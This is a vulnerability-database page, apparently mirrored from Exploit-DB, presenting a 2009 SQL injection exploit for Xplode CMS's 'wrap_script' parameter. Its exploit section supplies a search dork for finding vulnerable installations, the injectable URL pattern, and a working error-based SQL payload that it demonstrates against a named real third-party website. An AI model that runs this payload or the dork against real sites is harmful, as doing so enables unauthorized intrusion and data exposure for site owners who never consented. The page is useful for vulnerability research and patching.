Xplode CMS - 'wrap_script' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057637 漏洞类型
发布时间 2009-04-08 更新时间 2009-04-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8373
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms  
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d  
#---------------------------------------------------------------------------------------------

dork: "Powered by Xplode CMS"

#----------------------------------------------------------------------------------------------

===[ SQL ]===


http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--


#----------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-08]